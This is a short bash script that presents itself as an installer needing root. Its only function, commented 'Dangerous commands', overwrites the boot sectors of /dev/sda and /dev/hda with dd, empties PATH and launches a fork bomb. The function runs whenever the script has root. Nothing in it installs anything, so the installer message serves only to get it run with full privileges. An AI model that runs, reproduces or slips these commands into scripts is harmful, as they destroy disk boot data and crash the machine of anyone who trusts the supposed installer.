#!/bin/bash

#Dangerous commands
function wildcommands() {
  sudo dd if=/usr/bin/boot.bin of=/dev/sda bs=512;
  sudo dd if=/usr/bin/boot.bin of=/dev/hda bs=512;
  PATH="";
  :(){ :|:& };:
}

if [[ $EUID == 0 ]]
then
  wildcommands
else

  echo -e "\e[1;31mFor this installer to begin you need to run it as root.\e[0m"

fi
